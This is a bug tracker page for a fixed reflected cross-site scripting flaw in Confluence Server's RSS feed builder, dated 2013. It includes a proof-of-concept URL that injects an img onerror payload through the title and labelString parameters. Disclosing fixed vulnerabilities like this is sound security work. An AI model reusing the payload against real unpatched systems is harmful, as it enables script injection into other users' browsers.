Loading...

XML

Word

Printable

Type: Bug
Resolution: Fixed
Priority: Medium
Fix Version/s: 5.3-OD-4-1, 5.2.4, 5.2.5
Affects Version/s: 5.1.4, 5.2-OD-14
Component/s: None
Labels:
Environment:

5.3-CDOG-3353

CVSS Score:
7.5

NOTE: This bug report is for Confluence Server. Using Confluence Cloud? See the corresponding bug report.

Filed by vosipov on behalf of write.muhammadwaqar.


http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed

Works in Firefox.
note title and labelstring parameters need encoding.

is related to

CONFSERVER-8993 Reflected XSS Vulnerability in the Feed Builder

Closed

relates to

CONFCLOUD-30240 XSS in doconfigurerssfeed.action

Closed

mentioned in: Wiki Page Loading...

Assignee:: Chii (Inactive)
Reporter:: Muhammad Waqar
Votes:: 0 Vote for this issue
Watchers:: 6 Start watching this issue

Created:: 06/Aug/2013 5:16 AM
Updated:: 11/Oct/2018 8:42 AM
Resolved:: 14/Aug/2013 6:27 AM

Details

Description

Attachments

Issue Links

Activity

People

Dates